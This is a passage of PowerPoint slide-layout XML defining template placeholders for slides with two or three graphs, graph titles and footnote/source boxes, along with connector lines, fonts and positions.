              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8DC738-4037-4237-BAB7-86B39D39E3DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1457194"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFF319E-6DBC-44DF-A53F-FCD666A4AD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1999130"/>
            <a:ext cx="5327650" cy="3854824"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59693680-0040-4E91-884A-D427AF4875DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1999130"/>
            <a:ext cx="5327650" cy="3854824"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{733755BA-71D4-4CBA-B704-A972C8D5EFBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="6024283"/>
            <a:ext cx="5328000" cy="167809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F58ECE0-1B4F-46E5-BD09-716EBD33EB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="6024283"/>
            <a:ext cx="5328000" cy="167809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96938985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box &amp; graph with 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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFD8DC6-333F-4D12-B2B1-E0CC8E63A54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6022713" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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7" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE376A4-7281-4F17-A9FD-693411D93715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1457194"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E8DC738-4037-4237-BAB7-86B39D39E3DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1457194"/>
            <a:ext cx="5328000" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59693680-0040-4E91-884A-D427AF4875DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="1999130"/>
            <a:ext cx="5327650" cy="3854824"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F58ECE0-1B4F-46E5-BD09-716EBD33EB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6358059" y="6024283"/>
            <a:ext cx="5328000" cy="167809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A5B07B7-037F-468E-8448-5A29FA5C1783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358776" y="1999130"/>
            <a:ext cx="5328591" cy="4130207"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" sz="1800" dirty="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="18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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312362443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3 graphs with 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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFD8DC6-333F-4D12-B2B1-E0CC8E63A54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7990390" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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7" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE376A4-7281-4F17-A9FD-693411D93715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358777" y="1457194"/>
            <a:ext cx="3487312" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EFF319E-6DBC-44DF-A53F-FCD666A4AD0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="1999130"/>
            <a:ext cx="3487082" cy="3738282"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Add graph</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B1D0B4F-4C26-470A-9E53-C4AAD8791734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4065085" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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18" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBFDE300-6665-4B15-B788-A2FFCDB4D523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284081" y="1457194"/>
            <a:ext cx="3487312" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1120989F-E7F9-408B-8E51-7D03D9500726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209387" y="1457194"/>
            <a:ext cx="3487312" cy="343161"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add graph title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8072778C-C677-44DC-9873-FB44EA96CED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358767" y="5853954"/>
            <a:ext cx="3487073" cy="275383"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="900" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add footnote/source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Chart Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE6656A-2C85-499A-AFED-D7DC8FCF3D1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284081" y="1999130"/>
            <a:ext cx="3487082" cy="3738282"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
